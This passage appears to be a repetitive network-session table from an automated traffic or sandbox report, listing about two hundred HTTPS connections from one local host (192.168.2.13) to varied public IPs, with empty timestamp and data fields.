                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18334192.168.2.133292893.102.175.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18335192.168.2.136087879.221.65.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18336192.168.2.135225018.228.161.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18337192.168.2.1352676165.237.148.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18338192.168.2.1358442106.215.29.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18339192.168.2.1339052154.246.106.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18340192.168.2.1340302150.197.237.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18341192.168.2.1360644220.49.93.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18342192.168.2.1358216199.194.216.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18343192.168.2.1354690128.59.85.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18344192.168.2.133989080.148.250.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18345192.168.2.1335686208.163.226.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18346192.168.2.1344344144.105.230.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18347192.168.2.1335940170.192.109.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18348192.168.2.134463096.141.17.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18349192.168.2.1354176129.237.106.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18350192.168.2.1351724130.119.141.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18351192.168.2.134500078.90.47.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18352192.168.2.1344468162.8.118.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18353192.168.2.1350854138.221.90.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18354192.168.2.1339960184.204.155.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18355192.168.2.135123025.205.190.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18356192.168.2.1347894150.110.61.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18357192.168.2.1350946221.247.168.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18358192.168.2.133324638.132.194.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18359192.168.2.1347922126.14.199.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18360192.168.2.1346756217.214.135.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18361192.168.2.1351586153.128.175.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18362192.168.2.134498413.140.154.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18363192.168.2.133998858.83.156.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18364192.168.2.133702052.80.114.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18365192.168.2.1349716146.77.144.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18366192.168.2.1348242216.87.154.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18367192.168.2.13341321.143.119.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18368192.168.2.1333652156.83.229.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18369192.168.2.1353532128.210.143.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18370192.168.2.133536045.193.87.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18371192.168.2.1338124203.37.10.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18372192.168.2.1348632163.9.93.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18373192.168.2.1335338184.126.237.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18374192.168.2.1344888158.69.103.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18375192.168.2.1360750203.97.206.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18376192.168.2.1340666188.146.80.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18377192.168.2.1338226190.220.168.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18378192.168.2.135933889.179.128.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18379192.168.2.135218084.113.126.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18380192.168.2.1349276219.62.191.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18381192.168.2.133431469.128.72.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18382192.168.2.1352892181.103.121.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18383192.168.2.1344290219.161.65.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18384192.168.2.135392634.206.242.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18385192.168.2.1337470103.189.3.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18386192.168.2.135490412.95.65.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18387192.168.2.135386461.155.166.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18388192.168.2.1340264206.89.180.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18389192.168.2.135407259.98.155.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18390192.168.2.1335112119.222.35.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18391192.168.2.1337274161.179.100.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18392192.168.2.134282499.174.30.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18393192.168.2.1342922184.87.128.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18394192.168.2.1352830191.179.187.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18395192.168.2.1340918208.185.201.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18396192.168.2.133335297.8.134.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18397192.168.2.133547066.61.36.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18398192.168.2.1356194151.164.193.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18399192.168.2.1350318157.170.98.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18400192.168.2.134262653.40.97.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18401192.168.2.1343022107.162.76.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18402192.168.2.134365060.120.146.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18403192.168.2.1353708166.50.252.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18404192.168.2.135599072.235.172.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18405192.168.2.1343770161.66.140.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18406192.168.2.133830081.230.253.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18407192.168.2.1358858150.135.187.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18408192.168.2.1333254166.243.80.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18409192.168.2.1345494192.183.218.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18410192.168.2.1354992180.31.60.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18411192.168.2.1347652155.135.119.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18412192.168.2.1337330146.59.9.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18413192.168.2.1355974145.180.169.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18414192.168.2.134795654.247.104.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18415192.168.2.1339882134.116.106.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18416192.168.2.136042264.104.231.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18417192.168.2.13401525.189.60.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18418192.168.2.1357862150.255.2.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18419192.168.2.135401892.168.18.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18420192.168.2.1346014172.80.87.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18421192.168.2.134978454.106.231.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18422192.168.2.13419128.91.103.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18423192.168.2.1347150154.189.215.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18424192.168.2.133558843.42.219.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18425192.168.2.1355424155.153.112.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18426192.168.2.136088423.103.48.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18427192.168.2.133806659.46.251.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18428192.168.2.135852846.121.142.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18429192.168.2.1359246217.200.211.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18430192.168.2.133325077.176.223.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18431192.168.2.1351098149.48.243.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18432192.168.2.1360136147.178.1.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18433192.168.2.1353146175.234.71.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18434192.168.2.1350368167.162.32.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18435192.168.2.134887650.7.231.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18436192.168.2.1337708208.110.235.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18437192.168.2.133676271.161.169.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18438192.168.2.133458061.202.191.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18439192.168.2.1354116107.3.251.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18440192.168.2.135115891.192.61.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18441192.168.2.1353190184.196.175.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18442192.168.2.1354226156.94.124.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18443192.168.2.134779490.152.168.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18444192.168.2.1337176183.109.231.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18445192.168.2.135682666.191.222.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18446192.168.2.1353294164.57.42.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18447192.168.2.1349168202.38.110.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18448192.168.2.1344238195.103.97.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18449192.168.2.1358168103.170.180.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18450192.168.2.1346344167.187.86.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18451192.168.2.1354170134.96.35.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18452192.168.2.133829819.164.29.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18453192.168.2.1345390115.183.158.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18454192.168.2.133769658.33.86.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18455192.168.2.1341108185.75.28.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18456192.168.2.1343024188.57.197.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18457192.168.2.133317453.65.37.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18458192.168.2.1341396143.169.99.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18459192.168.2.1356456102.30.51.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18460192.168.2.1352948111.86.75.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18461192.168.2.135475079.175.14.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18462192.168.2.1350924112.106.87.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18463192.168.2.1334220223.90.181.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18464192.168.2.135881269.21.231.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18465192.168.2.1341982143.61.10.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18466192.168.2.1346436108.113.100.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18467192.168.2.1354094114.237.46.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18468192.168.2.1350230111.190.179.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18469192.168.2.1340302134.215.217.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18470192.168.2.133500883.167.216.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18471192.168.2.1340024179.18.98.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18472192.168.2.1339692222.113.203.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18473192.168.2.134494695.73.186.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18474192.168.2.133467435.248.97.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18475192.168.2.135917647.62.90.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18476192.168.2.134273260.166.153.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18477192.168.2.1357976193.188.74.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18478192.168.2.1338458154.19.132.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18479192.168.2.135979840.3.47.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18480192.168.2.133835644.125.31.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18481192.168.2.1354164117.55.54.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18482192.168.2.1340672178.115.106.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18483192.168.2.133319046.228.205.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18484192.168.2.1346310221.51.64.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18485192.168.2.1350954165.46.192.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18486192.168.2.135607265.151.166.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18487192.168.2.133836077.53.185.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18488192.168.2.1344766110.223.184.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18489192.168.2.135513423.135.78.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18490192.168.2.135615052.189.70.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18491192.168.2.1350598139.13.87.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18492192.168.2.135364644.203.8.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18493192.168.2.1358748111.52.105.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18494192.168.2.1344158100.158.63.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18495192.168.2.1341586211.101.73.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18496192.168.2.1346196109.70.70.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18497192.168.2.1348574141.76.102.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18498192.168.2.135012851.239.52.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18499192.168.2.13414125.225.36.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18500192.168.2.1359420106.81.192.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18501192.168.2.1352856105.89.2.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18502192.168.2.1336954204.200.65.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18503192.168.2.135803438.196.210.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18504192.168.2.1342964211.220.108.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18505192.168.2.135671469.63.55.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18506192.168.2.1334856177.211.74.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18507192.168.2.1346756106.1.31.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18508192.168.2.1341076200.147.200.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18509192.168.2.134122836.185.126.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18510192.168.2.135213052.32.123.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18511192.168.2.1354096136.38.50.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18512192.168.2.1338838197.160.79.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18513192.168.2.1360764173.127.182.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18514192.168.2.13339868.57.79.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18515192.168.2.1344924171.127.135.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18516192.168.2.135039674.111.157.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18517192.168.2.1356896155.131.116.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18518192.168.2.136039617.193.143.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18519192.168.2.1360228190.91.188.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18520192.168.2.13336508.4.181.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18521192.168.2.133910251.48.254.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18522192.168.2.135498074.149.161.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18523192.168.2.1349234104.221.192.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18524192.168.2.13373865.227.170.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18525192.168.2.1353086206.215.39.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18526192.168.2.136087848.21.129.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18527192.168.2.1350890152.181.5.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18528192.168.2.135963012.34.203.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18529192.168.2.1347350217.169.195.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18530192.168.2.134573894.126.95.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18531192.168.2.1355410203.97.105.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18532192.168.2.1337048171.108.62.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18533192.168.2.134411285.193.61.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18534192.168.2.1340464160.75.139.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18535192.168.2.1355060157.144.192.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18536192.168.2.1350390107.49.28.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18537192.168.2.1349602174.199.71.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18538192.168.2.1336464192.47.45.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18539192.168.2.1333800173.167.37.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18540192.168.2.1340630112.148.109.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18541192.168.2.1351792145.143.178.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18542192.168.2.134369473.197.231.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18543192.168.2.1337894116.190.53.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18544192.168.2.1338578222.48.51.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18545192.168.2.1348510218.153.207.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18546192.168.2.134809044.104.24.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18547192.168.2.135066675.232.136.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18548192.168.2.13336285.210.217.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18549192.168.2.13549624.122.50.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18550192.168.2.134113413.116.195.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18551192.168.2.1341204122.190.224.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18552192.168.2.1346266129.60.201.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18553192.168.2.1356330210.209.254.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18554192.168.2.1346484221.113.213.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18555192.168.2.135574262.191.57.128443
